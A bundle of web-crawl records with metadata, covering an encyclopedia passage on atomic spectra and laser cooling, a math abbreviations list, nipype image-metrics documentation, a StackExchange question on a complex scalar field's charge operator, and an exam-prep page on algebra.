The sᵢ are coupled strongly together to form a resultant S, the total spin angular momentum. The weakest coupling is that between L and S to form J, the total angular momentum of the electron system of the atom in this state.\n\nCoupling of the LS type is generally applicable to the low-energy states of the lighter atoms. The next commonest type is called jj coupling, represented in Eq. (9).\n\n(9)", null, "Each electron has its spin coupled to its own orbital angular momentum to form a jᵢ for that electron. The various jᵢ are then more weakly coupled together to give J. This type of coupling is seldom strictly observed. In the heavier atoms it is common to find a condition intermediate between LS and jj coupling; then either the LS or jj notation may be used to describe the levels, because the number of levels for a given electron configuration is independent of the coupling scheme.\n\n#### Nuclear magnetism and hyperfine structure\n\nMost atomic nuclei also possess spin, but rotate about 2000 times slower than electrons because their mass is on the order of 2000 or more times greater than that of electrons. Because of this, very weak nuclear magnetic fields, analogous to the electronic ones that produce fine structure in spectral lines, further split atomic energy levels. Consequently, spectral lines arising from them are split according to the relative orientations, and hence energies of interaction, of the nuclear magnetic moments with the electronic ones. The resulting pattern of energy levels and corresponding spectral-line components is referred to as hyperfine structure. See Nuclear moments\n\nNuclear properties also affect atomic spectra through the isotope shift. This is the result of the difference in nuclear masses of two isotopes, which results in a slight change in the Rydberg constant. There is also sometimes a distortion of the nucleus, which can be detected by ultrahigh precision spectroscopy.
See Molecular beams, Particle trap\n\nIn most cases, a common problem called Doppler broadening of the spectral lines arises, which can cause overlapping of spectral lines and make analysis difficult. The broadening arises from motion of the emitted atom with respect to a spectrometer. Several ingenious ways of isolating only those atoms nearly at rest with respect to spectrometric apparatus have been devised. The most powerful employ lasers and either involve saturation spectroscopy, utilizing a saturating beam and probe beam from the same tunable laser, or use two laser photons which jointly drive a single atomic transition and are generated in lasers so arranged that the first-order Doppler shifts of the photons cancel each other. See Doppler effect\n\nIt would be misleading to think that the most probable fate of excited atomic electrons consists of transitions to lower orbits, accompanied by photon emission. In fact, for at least the first third of the periodic table, the preferred decay mode of most excited atomic systems in most states of excitation and ionization is the electron emission process first observed by P. Auger in 1925 and named after him. For example, a singly charged neon ion lacking a 1s electron is more than 50 times as likely to decay by electron emission as by photon emission. In the process, an outer atomic electron descends to fill an inner vacancy, while another is ejected from the atom to conserve both total energy and momentum in the atom. The ejection usually arises because of the interelectron Coulomb repulsion. See Auger effect\n\n#### Cooling and stopping atoms and ions\n\nDespite impressive progress in reducing Doppler shifts and Doppler spreads, these quantities remain factors that limit the highest obtainable spectroscopic resolutions. 
The 1980s and 1990s saw extremely rapid development of techniques for trapping neutral atoms and singly charged ions in a confined region of space, and then cooling them to much lower temperatures by the application of laser-light cooling techniques. Photons carry not only energy but also momentum; hence they can exert pressure on neutral atoms as well as charged ions. See Laser cooling\n\nSchemes have been developed to exploit these light forces to confine neutral atoms in the absence of material walls, whereas various types of so-called bottle configurations of electromagnetic fields developed earlier remain the technique of choice for similarly confining ions. Various ingenious methods have been invented to slow down and even nearly stop neutral atoms and singly charged ions, whose energy levels (unlike those of most more highly charged ions) are accessible to tunable dye lasers. These methods often utilize the velocity-dependent light pressure from laser photons of nearly the same frequency as, but slightly less energetic than, the energy separation of two atomic energy levels to induce a transition between these levels.\n\nThe magnetooptic trap combines optical forces provided by laser light with a weak magnetic field whose size goes through zero at the geometrical center of the trap and increases with distance from this center. The net result is a restoring force which confines sufficiently laser-cooled atoms near the center. Ingenious improvements have allowed cooling of ions to temperatures as low as 180 × 10⁻⁹ K.\n\nFor more highly ionized ions, annular storage rings are used in which radial confinement of fast ion beams (with speeds of approximately 10% or more of the speed of light) is provided by magnetic focusing. Two cooling schemes are known to work on stored beams of charged particles, the so-called stochastic cooling method and the electron cooling method.
In the former, deviations from mean stored particle energies are electronically detected, and electronic “kicks” that have been adjusted in time and direction are delivered to the stored particles to compensate these deviations. In electron cooling, which proves to be more effective for stored heavy ions of high charge, electron beams prepared with a narrow velocity distribution are merged with the stored ion beams. When the average speeds of the electrons and the ions are matched, the Coulomb interaction between the relatively cold (low-velocity-spread) electrons and the highly charged ions efficiently transfers energy from the warmer ions, thereby reducing the temperature of the stored ions.\n\nMcGraw-Hill Concise Encyclopedia of Physics. © 2002 by The McGraw-Hill Companies, Inc." ]
[ null, "https://img.tfd.com/mgh/cep/math/060900MF0010.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0040.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0050.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0060.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0070.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0080.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0090.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0100.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0110.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9313173,"math_prob":0.9569007,"size":18494,"snap":"2021-04-2021-17","text_gpt3_token_len":3589,"char_repetition_ratio":0.1443483,"word_repetition_ratio":0.004095563,"special_character_ratio":0.18492484,"punctuation_ratio":0.089115016,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9660977,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-24T05:21:46Z\",\"WARC-Record-ID\":\"<urn:uuid:3ac6cff1-3d4d-4b83-a3fc-e5221525137f>\",\"Content-Length\":\"62599\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:56fb4a41-7877-4af3-9943-ed6b1702e4e8>\",\"WARC-Concurrent-To\":\"<urn:uuid:791eceef-575f-44a3-b288-d4d62378e3b9>\",\"WARC-IP-Address\":\"85.195.124.227\",\"WARC-Target-URI\":\"https://encyclopedia2.thefreedictionary.com/Atomic+structure+and+spectra\",\"WARC-Payload-Digest\":\"sha1:OIHT6RCCSORR6TBJS32GAF2J5Q2CGCCB\",\"WARC-Block-Digest\":\"sha1:UGPRW65L2WHO6ZOGARM3CBIDCTVFSGXW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703547333.68_warc_CC-MAIN-20210124044618-20210124074618-00017.warc.gz\"}"}
https://www.onlineabbreviations.com/acronyms/math
[ "# Mathematics Abbreviations\n\n#### Browse all acronyms and abbreviations related to the Mathematics terminology and jargon.\n\nThis page lists all 3368 abbreviations related to the Mathematics terminology and jargon, under the category Academic & Science\n\n3368 Abbreviations & Definitions of Acronyms Mathematics in category Academic & Science\n\nBrowse all abbreviations related to the acronym Mathematics. All abbreviations on this page are ! means Factorial, \" means Second derivative, # means Number, % means Per Cent, ( ] means Half Open Set on the Left, () means Open Set, * means Multiplication, - means Subtraction, - means Negative, -1' means Minus One Dash, / means Division, 00110 means The binary representation for the number 6, 121 means One-to-One correspondence, 1E1 means A hexadecimal number equal to 481 in decimal, 1E6 means 1,000,000, 1E9 means The shorthand form for the number 1,000,000,000 (a billion) in mathematics. It is more commonly written as 10^9., 1NF means First Normal Form, 250K means Two Hundred Fifty Thousand, 2D means Two Dimensional, 2DFT means Two-Dimensional Fourier Transform,\n\nAbbreviationsDefinitionMore\n!Factorial. !\n\"Second derivative. \"\n#Number. #\n%Per Cent. %\n( ]Half Open Set on the Left. ( ]\n()Open Set. ()\n*Multiplication. *\n-Subtraction. -\n-Negative. -\n-1'Minus One Dash. -1'\n/Division. /\n00110The binary representation for the number 6. 00110\n121One-to-One correspondence. 121\n1E1A hexadecimal number equal to 481 in decimal. 1E1\n1E61,000,000. 1E6\n1E9The shorthand form for the number 1,000,000,000 (a billion) in mathematics. It is more commonly written as 10^9.. 1E9\n1NFFirst Normal Form. 1NF\n250KTwo Hundred Fifty Thousand. 250K\n2DTwo Dimensional. 2D\n2DFTTwo-Dimensional Fourier Transform.
2DFT" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.77737606,"math_prob":0.85751206,"size":1778,"snap":"2019-51-2020-05","text_gpt3_token_len":516,"char_repetition_ratio":0.13585119,"word_repetition_ratio":0.13818182,"special_character_ratio":0.3200225,"punctuation_ratio":0.184375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95516926,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-28T21:03:24Z\",\"WARC-Record-ID\":\"<urn:uuid:5cf0bf2e-1483-4014-9a54-5b83e118e6af>\",\"Content-Length\":\"20735\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ac79696f-375b-4ba0-b6b2-b29e5ff20d42>\",\"WARC-Concurrent-To\":\"<urn:uuid:f7a69f2e-524c-4acc-9fe8-e5db4d066635>\",\"WARC-IP-Address\":\"104.18.56.18\",\"WARC-Target-URI\":\"https://www.onlineabbreviations.com/acronyms/math\",\"WARC-Payload-Digest\":\"sha1:O6VD3B35PJ5ZIC23BYBKPOM5SCWSPKMX\",\"WARC-Block-Digest\":\"sha1:GFAAK3WA4DLDZJIQTQQA4O2VUS5ZSIBD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251783000.84_warc_CC-MAIN-20200128184745-20200128214745-00502.warc.gz\"}"}
https://nipype.readthedocs.io/en/latest/interfaces/generated/nipype.algorithms.metrics.html
[ "# algorithms.metrics¶\n\n## Distance¶\n\nCalculates distance between two volumes.\n\nInputs:\n\n```[Mandatory]\nvolume1: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume2.\nvolume2: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume1.\n\n[Optional]\nmethod: ('eucl_min' or 'eucl_cog' or 'eucl_mean' or 'eucl_wmean' or\n'eucl_max', nipype default value: eucl_min)\n\"\"eucl_min\": Euclidean distance between two closest points\n\"eucl_cog\": mean Euclidian distance between the Center of Gravity of\nvolume1 and CoGs of volume2 \"eucl_mean\": mean Euclidian minimum\ndistance of all volume2 voxels to volume1 \"eucl_wmean\": mean\nEuclidian minimum distance of all volume2 voxels to volume1 weighted\nby their values \"eucl_max\": maximum over minimum Euclidian distances\nof all volume2 voxels to volume1 (also known as the Hausdorff\ndistance)\nmask_volume: (a pathlike object or string representing an existing\nfile)\ncalculate overlap only within this mask.\n```\n\nOutputs:\n\n```distance: (a float)\npoint1: (an array with shape (3,))\npoint2: (an array with shape (3,))\nhistogram: (a pathlike object or string representing a file)\n```\n\n## ErrorMap¶\n\nCalculates the error (distance) map between two input volumes.\n\n### Example¶\n\n```>>> errormap = ErrorMap()\n>>> errormap.inputs.in_ref = 'cont1.nii'\n>>> errormap.inputs.in_tst = 'cont2.nii'\n>>> res = errormap.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nin_ref: (a pathlike object or string representing an existing file)\nReference image. Requires the same dimensions as in_tst.\nin_tst: (a pathlike object or string representing an existing file)\nTest image. 
Requires the same dimensions as in_ref.\nmetric: ('sqeuclidean' or 'euclidean', nipype default value:\nsqeuclidean)\nerror map metric (as implemented in scipy cdist)\n\n[Optional]\nmask: (a pathlike object or string representing an existing file)\ncalculate overlap only within this mask.\nout_map: (a pathlike object or string representing a file)\nName for the output file\n```\n\nOutputs:\n\n```out_map: (a pathlike object or string representing an existing file)\nresulting error map\ndistance: (a float)\nAverage distance between volume 1 and 2\n```\n\n## FuzzyOverlap¶\n\nCalculates various overlap measures between two maps, using the fuzzy definition proposed in: Crum et al., Generalized Overlap Measures for Evaluation and Validation in Medical Image Analysis, IEEE Trans. Med. Ima. 25(11),pp 1451-1461, Nov. 2006.\n\nin_ref and in_tst are lists of 2/3D images, each element on the list containing one volume fraction map of a class in a fuzzy partition of the domain.\n\n### Example¶\n\n```>>> overlap = FuzzyOverlap()\n>>> overlap.inputs.in_ref = [ 'ref_class0.nii', 'ref_class1.nii' ]\n>>> overlap.inputs.in_tst = [ 'tst_class0.nii', 'tst_class1.nii' ]\n>>> overlap.inputs.weighting = 'volume'\n>>> res = overlap.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nin_ref: (a list of items which are a pathlike object or string\nrepresenting an existing file)\nReference image. Requires the same dimensions as in_tst.\nin_tst: (a list of items which are a pathlike object or string\nrepresenting an existing file)\nTest image. Requires the same dimensions as in_ref.\n\n[Optional]\nin_mask: (a pathlike object or string representing an existing file)\nweighting: ('none' or 'volume' or 'squared_vol', nipype default\nvalue: none)\n'none': no class-overlap weighting is performed. 
'volume': computed\nclass-overlaps are weighted by class volume 'squared_vol': computed\nclass-overlaps are weighted by the squared volume of the class\nout_file: (a pathlike object or string representing a file, nipype\ndefault value: diff.nii)\nalternative name for resulting difference-map\n```\n\nOutputs:\n\n```jaccard: (a float)\nFuzzy Jaccard Index (fJI), all the classes\ndice: (a float)\nFuzzy Dice Index (fDI), all the classes\nclass_fji: (a list of items which are a float)\nArray containing the fJIs of each computed class\nclass_fdi: (a list of items which are a float)\nArray containing the fDIs of each computed class\n```\n\n## Overlap¶\n\nCalculates Dice and Jaccard’s overlap measures between two ROI maps. The interface is backwards compatible with the former version in which only binary files were accepted.\n\nThe averaged values of overlap indices can be weighted. Volumes can now be reported in mm^3, although they are given in voxels to keep backwards compatibility.\n\n### Example¶\n\n```>>> overlap = Overlap()\n>>> overlap.inputs.volume1 = 'cont1.nii'\n>>> overlap.inputs.volume2 = 'cont2.nii'\n>>> res = overlap.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nvolume1: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume2.\nvolume2: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume1.\nbg_overlap: (a boolean, nipype default value: False)\nconsider zeros as a label\nvol_units: ('voxel' or 'mm', nipype default value: voxel)\nunits for volumes\n\n[Optional]\nmask_volume: (a pathlike object or string representing an existing\nfile)\ncalculate overlap only within this mask.\nout_file: (a pathlike object or string representing a file, nipype\ndefault value: diff.nii)\nweighting: ('none' or 'volume' or 'squared_vol', nipype default\nvalue: none)\n'none': no class-overlap weighting is performed. 
'volume': computed\nclass-overlaps are weighted by class volume 'squared_vol': computed\nclass-overlaps are weighted by the squared volume of the class\n```\n\nOutputs:\n\n```jaccard: (a float)\naveraged jaccard index\ndice: (a float)\naveraged dice index\nroi_ji: (a list of items which are a float)\nthe Jaccard index (JI) per ROI\nroi_di: (a list of items which are a float)\nthe Dice index (DI) per ROI\nvolume_difference: (a float)\naveraged volume difference\nroi_voldiff: (a list of items which are a float)\nvolume differences of ROIs\nlabels: (a list of items which are an integer (int or long))\ndetected labels\ndiff_file: (a pathlike object or string representing an existing\nfile)\nerror map of differences\n```\n\n## Similarity¶\n\nCalculates similarity between two 3D or 4D volumes. Both volumes have to be in the same coordinate system, same space within that coordinate system and with the same voxel dimensions.\n\nNote\n\nThis interface is an extension of `nipype.interfaces.nipy.utils.Similarity` to support 4D files. Requires `nipy`\n\n### Example¶\n\n```>>> from nipype.algorithms.metrics import Similarity\n>>> similarity = Similarity()\n>>> similarity.inputs.volume1 = 'rc1s1.nii'\n>>> similarity.inputs.volume2 = 'rc1s2.nii'\n>>> similarity.inputs.metric = 'cr'\n>>> res = similarity.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nvolume1: (a pathlike object or string representing an existing file)\n3D/4D volume\nvolume2: (a pathlike object or string representing an existing file)\n3D/4D volume\n\n[Optional]\nmask1: (a pathlike object or string representing an existing file)\n3D volume\nmask2: (a pathlike object or string representing an existing file)\n3D volume\nmetric: ('cc' or 'cr' or 'crl1' or 'mi' or 'nmi' or 'slr' or a\ncallable value, nipype default value: None)\nstr or callable\nCost-function for assessing image similarity. 
If a string,\none of 'cc': correlation coefficient, 'cr': correlation\nratio, 'crl1': L1-norm based correlation ratio, 'mi': mutual\ninformation, 'nmi': normalized mutual information, 'slr':\nsupervised log-likelihood ratio. If a callable, it should\ntake a two-dimensional array representing the image joint\nhistogram as an input and return a float.\n```\n\nOutputs:\n\n```similarity: (a list of items which are a float)\n```" ]
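The Dice and Jaccard indices reported by the Overlap and FuzzyOverlap interfaces above have simple set-theoretic definitions. The sketch below is a dependency-free illustration of those definitions, modelling each ROI as a set of voxel coordinates; nipype itself operates on image files, so this is not the library's implementation:

```python
# Dice and Jaccard overlap indices for two ROIs modelled as voxel sets.

def dice(a, b):
    """Dice index: 2*|A ∩ B| / (|A| + |B|)."""
    return 2.0 * len(a & b) / (len(a) + len(b))

def jaccard(a, b):
    """Jaccard index: |A ∩ B| / |A ∪ B|."""
    return len(a & b) / len(a | b)

roi_ref = {(0, 0), (0, 1), (1, 0), (1, 1)}   # 4 voxels
roi_tst = {(0, 1), (1, 0), (1, 1), (2, 1)}   # 4 voxels, 3 shared with roi_ref

print(dice(roi_ref, roi_tst))     # 2*3 / (4+4) -> 0.75
print(jaccard(roi_ref, roi_tst))  # 3 / 5 -> 0.6
```

The two indices are related by J = D / (2 - D), which holds here: 0.75 / 1.25 = 0.6.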
[ null, "https://nipype.readthedocs.io/en/latest/_images/math/33874d361f927647c8c66416f6cc21a3cf1a2e64.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.72073716,"math_prob":0.6424996,"size":7486,"snap":"2019-26-2019-30","text_gpt3_token_len":1885,"char_repetition_ratio":0.17214648,"word_repetition_ratio":0.35740742,"special_character_ratio":0.23657493,"punctuation_ratio":0.15437788,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9739568,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-21T19:04:04Z\",\"WARC-Record-ID\":\"<urn:uuid:bb80a5ca-0b2e-46e1-ae4d-cb719c62c67b>\",\"Content-Length\":\"50767\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c83f7b6-6d74-42d9-a20f-6afd445d3cf5>\",\"WARC-Concurrent-To\":\"<urn:uuid:f17ab454-eaae-46fb-bda7-fc1297731e32>\",\"WARC-IP-Address\":\"137.116.78.48\",\"WARC-Target-URI\":\"https://nipype.readthedocs.io/en/latest/interfaces/generated/nipype.algorithms.metrics.html\",\"WARC-Payload-Digest\":\"sha1:O7FJ3N44ZQP4WLL5A76RAZ7HSLQX2HAF\",\"WARC-Block-Digest\":\"sha1:HKYXMTSXCJSTBN6MBNXBQ4DSSVJLDMSC\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195527196.68_warc_CC-MAIN-20190721185027-20190721211027-00082.warc.gz\"}"}
https://physics.stackexchange.com/questions/218616/how-to-fourier-transform-creation-annihilation-operators
[ "How to Fourier transform creation/annihilation operators?\n\nZee's QFT in a Nutshell pages 65-66. For a complex scalar QFT\n\n$$\\varphi(\\vec{x},t) = \\int\\frac{d^Dk}{\\sqrt{(2\\pi)^D2\\omega_k}}\\left[a(\\vec{k})\\mathrm{e}^{-i(\\omega_kt-\\vec{k}\\cdot\\vec{x})} + b^\\dagger(\\vec{k})\\mathrm{e}^{i(\\omega_kt-\\vec{k}\\cdot\\vec{x})}\\right] \\tag{17}$$\n\nwith creation/annihilation operators $a,a^\\dagger,b,b^\\dagger$ he defines the current $J$ and charge $Q$:\n\n\\begin{align} J_\\mu & = i(\\varphi^\\dagger\\partial_\\mu\\varphi - \\partial_\\mu\\varphi^\\dagger\\varphi)\\tag{18}\\\\ Q & = \\int d^DxJ_0(x). \\end{align}\n\nI want to check that\n\n\\begin{align} \\tag{1} Q = \\int d^Dk[a^\\dagger(\\vec{k})a(\\vec{k}) - b^\\dagger(\\vec{k})b(\\vec{k})] \\end{align}\n\nThat's what I've done so far (there are three integrals, the $dx$ one from the definition of $Q$, the $dk$ and $dl$ ones from the $\\varphi$ and $\\partial_\\mu\\varphi$ in the definition of $J$):\n\n\\begin{align} Q = & \\int d^DxJ_0(x) = i\\int d^Dx(\\varphi^\\dagger\\partial_0 \\varphi - \\varphi\\partial_0\\varphi^\\dagger)\\\\ % = \\,& i\\int d^Dx(\\varphi^\\dagger\\pi - \\varphi\\pi^\\dagger)\\\\ = & i(i\\omega_k)\\iiint d^Dxd^Dkd^Dl\\frac{1}{(\\sqrt{(2\\pi)^D 2\\omega_k})^2}\\bigg[\\\\ & \\left(a^\\dagger(\\vec{k})e^{ikx}+b(\\vec{k})e^{-ikx}\\right) \\left(-a(\\vec{l})e^{-ilx}+b^\\dagger(\\vec{l})e^{ilx}\\right)-\\\\ & \\left(a(\\vec{k})e^{-ikx}+b^\\dagger(\\vec{k})e^{ikx}\\right) \\left(a^\\dagger(\\vec{l})e^{ilx}-b(\\vec{l})e^{-ilx}\\right) \\bigg]\\\\ = & \\iiint d^Dxd^Dkd^Dl\\frac{1}{2(2\\pi)^D}\\bigg[\\\\ & a^\\dagger(\\vec{k})a(\\vec{l})e^{ix(k-l)}+a(\\vec{k})a^\\dagger(\\vec{l})e^{ix(l-k)}-b^\\dagger(\\vec{k})b(\\vec{l})e^{ix(k-l)}-b(\\vec{k})b^\\dagger(\\vec{l})e^{ix(l-k)} +\\\\ & \\left(b^\\dagger(\\vec{k})a^\\dagger(\\vec{l})-a^\\dagger(\\vec{k})b^\\dagger(\\vec{l})\\right)e^{ix(k+l)} + \\left(b(\\vec{k})a(\\vec{l})-a(\\vec{k})b(\\vec{l})\\right)e^{ix(k+l)} \\bigg] 
\\end{align}\n\nIF I could set $k=l$, then this whole mess would clean up and I get the desired result: The last line should vanish because $[a, b]=[a^\\dagger,b^\\dagger]=0$. In the second-to-last line for $k=l$ we have $a^\\dagger a+aa^\\dagger = 2a^\\dagger a + 1$ because of $[a,a^\\dagger]=1$, and this would imply $(1)$.\n\nBut why can I set $k=l$? Maybe I can use $2\\pi\\delta(y)=\\int dz e^{-iyz}$ somehow to get a $\\delta(k-l)$ in the integral, but I'm too inexperienced in Fourier transforms of operators.\n\n• To be clear - space-time is $(D+1)$-dimensional? – Prahar Nov 15 '15 at 13:31\n• @Prahar yes, space-time is $(D+1)$-dimensional. To simplify the notation of the exponentials, I have used $xk = t\\omega_k - \\vec{x}\\cdot\\vec{k}$ with $\\omega_k=\\sqrt{k^2+m^2}$. – Bass Nov 15 '15 at 13:44\n• Why do you say \"maybe\" for your last attempt? That's exactly what you do - nothing else there depends on $x$, so you can just carry out the integral over it, and that gives you the delta function you need. – ACuriousMind Nov 15 '15 at 13:47\n• @ACuriousMind Arrrgh! Of course, I can just do the $dx$ integral first, then there are no operators in the integral! I desperately wanted to get rid of the $dl$ integral so I didn't care about the $dx$ one. ::sigh:: Thanks a lot! – Bass Nov 15 '15 at 13:56\n• @ACuriousMind what about the last line? There, I get a $\\delta(k+l)$, so $l=-k$. If the c/a operators were symmetric in their argument, then the last line would vanish. – Bass Nov 15 '15 at 14:08" ]
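As the resolution in the comments indicates, the missing step is to carry out the $d^Dx$ integral first, which turns the plane-wave factors into delta functions. A sketch of that step, in the question's own notation:

```latex
% The x-integral of a plane wave gives a D-dimensional delta function:
\int d^Dx\, e^{i\vec{x}\cdot(\vec{k}-\vec{l})} = (2\pi)^D\,\delta^D(\vec{k}-\vec{l})

% Applied to the second-to-last line, the delta function eats the dl
% integral and forces l = k (the time phases then cancel since w_l = w_k):
Q = \int d^Dk\,\frac{1}{2}\left[a^\dagger(\vec{k})a(\vec{k})
      + a(\vec{k})a^\dagger(\vec{k})
      - b^\dagger(\vec{k})b(\vec{k})
      - b(\vec{k})b^\dagger(\vec{k})\right]

% Using [a(k), a^\dagger(k')] = [b(k), b^\dagger(k')] = \delta^D(k - k') and
% dropping the (infinite) constant, i.e. normal ordering, recovers (1).
% The last line instead picks up \delta^D(\vec{k}+\vec{l}), i.e. l = -k;
% relabelling k -> -k in half of each term and using
% [a, b] = [a^\dagger, b^\dagger] = 0 makes those contributions cancel.
```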
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5965141,"math_prob":0.9999082,"size":2255,"snap":"2019-43-2019-47","text_gpt3_token_len":937,"char_repetition_ratio":0.22612172,"word_repetition_ratio":0.0,"special_character_ratio":0.39334813,"punctuation_ratio":0.045548655,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999888,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T10:47:29Z\",\"WARC-Record-ID\":\"<urn:uuid:fd367e1f-35c2-49d4-bf4f-d7be7f177b25>\",\"Content-Length\":\"141699\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:df1c2726-05ec-4b0a-a1fa-5248291d8b5a>\",\"WARC-Concurrent-To\":\"<urn:uuid:db107cca-7660-4fe0-8d91-70168828f3a0>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/218616/how-to-fourier-transform-creation-annihilation-operators\",\"WARC-Payload-Digest\":\"sha1:XHUYEC5L2NGVES7M7PEO26WTYP4EFDO2\",\"WARC-Block-Digest\":\"sha1:BOTYN6EJF2PX7GDMIYOQAVU5CE35VJDO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986692723.54_warc_CC-MAIN-20191019090937-20191019114437-00050.warc.gz\"}"}
https://gradeup.co/ssc-exams/algebra
[ "# Algebra for SSC and Railways Exams\n\nBy : Neha Uppal\n\nUpdated : Nov 6, 2020, 14:39\n\nAlgebra for SSC CGL has a good weightage so if you are preparing for these exams. Mathematics is a very wide subject that has different parts, including geometry, theory, and analysis concepts. Algebra is one of the most appreciated parts of applied Mathematical subjects. Applications of Algebra are widespread, whether it is solving complicated equations, handling data, or finding out the volume of water in a tank, calculating the velocity of your car; it is used everywhere and in various situations in day to day life. It is a vital subject when it comes to competitive exams so being very sure about your knowledge and concepts are all clear.\n\nGiven below are all the details concerning Algebra questions asked in SSC & Railway Exams. Find out the best way to prepare the Algebra questions, recommended books, tips to solve the questions, and more.\n\n## Important topics of algebra for SSC Exam\n\n Topic Explanation Introduction to Algebra Algebra is an integral and essential part of mathematics. Here we use different symbols, operations and numbers to deal with problems. Exponents Power of a number is referred to as exponent i. e. if a number say 'm' is multiplied to itself 'n' times (m*m*m....upto n times), it is represented as m^n (m raised to power n) where 'm' is the base and 'n' is the exponent.For example -For 2^5 (2*2*2*2*2), '2' is the base, and '5' is the exponent. Simplification There are various tricks and ways which we follow to simplify complex expressions. Some of the methods are BODMAS, modulus of a real number (modulus of a real number x is denoted |x| and it is the value of the number taken with a positive sign. Polynomials Polynomials form the base of algebra. An expression of the form ax^4 + x^3 - ax^2 + ax; where real numbers and the powers of variables are non-negative integers; i.e. 0,1,2….. 
Quadratic Equations Degree two polynomial equations are called quadratic equations, which means an equation that has the highest power of variable 2. The standard form of Q.E where a,b,c are constant real numbers (where a is not equal to 0) and x is the variable. A Q.E has two roots or two zeros.\n\n### Tips to prepare Algebra questions for SSC CGL\n\n• Be very thorough with your concepts.\n• Learn all the important topics under Algebra.\n• Keep all the Algebra formulas for SSC CGL on your fingertips.\n\n### Importance of Algebra in Quantitative Section of Competitive Banking & Government Exams\n\n• Has a high weightage.\n• Algebra questions for SSC CGLmains are scoring\n• They are easy\n• Concept-based questions.\n\n## Most Recommended Books for learning Algebra\n\nThe books you should refer to study algebra questions for SSC CGL mains include Algebra for SSC CGL and SSC Algebra (Volume 1 and 2).\n\n### Why prepare Algebra from Gradeup?\n\nMathematics is very important, and a bit difficult needs special attention. We need to learn specific topics with utmost finesse because their importance in competitive exams is high, just like Algebra. Here is why you should prepare from Gradeup:\n\n1. You can select your exam category and then start your preparations.\n2. You can take online mock tests.\n3. There are fresh questionnaires that are created by experts.\n4. You can check the detailed solutions and performance analysis.\n5. Full-length mock tests are available here.\n6. You can practice the mock papers in Hindi as well as English on Gradeup.\n\nQ1. What are the important topics of Algebra?\n\nA1. Though there are many important topics that you need to learn in algebra but to get a good grasp in this topic; you should be aware of everything related to polynomials, quadratic equations, basic algebra, exponents, and simplification.\n\nQ2. Is Algebra important WRT competitive studies?\n\nA2. 
Algebra plays a vital role in the mathematics section of every competitive exam. It is important because it not only helps you solve questions in the exams, but is also an answer to many of your day-to-day life problems.\n\nQ3. Are there any branches of Algebra?\n\nA3. Yes, there are various branches of Algebra, including Elementary Algebra, Advanced Algebra, Abstract Algebra, Linear Algebra, and Commutative Algebra.\n\nQ4. Is it important to learn polynomials?\n\nA4. Whenever we talk about Algebra, \"polynomials\" is a topic that comes up without a miss. You need to understand this topic for sure if you wish to score well in Algebra.\n\nQ5. What if I am unable to complete Algebra? Can I skip it?\n\nA5. Algebra is an important topic that holds a lot of marks. If you skip this topic, you are going to lose a lot of marks. So, it is advised by math experts that while studying math topics for your competitive exam, you make sure to learn Algebra by heart.\n\nPosted by:", null, "Member since Oct 2018\n4+ Years of experience as a mentor and content developer for SSC & Railways exam. Cleared various exams including SSC CHSL & SSC CGL exams.", null, "GradeStack Learning Pvt. Ltd., Windsor IT Park, Tower - A, 2nd Floor, Sector 125, Noida, Uttar Pradesh 201303 [email protected]" ]
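Since the table of topics leans on the standard form of a quadratic equation, here is a small illustrative sketch (the function name is our own, not from the article) that finds the two roots via the quadratic formula x = (-b ± √(b² - 4ac)) / 2a:

```python
import cmath  # complex sqrt, so a negative discriminant still yields two roots

def quadratic_roots(a, b, c):
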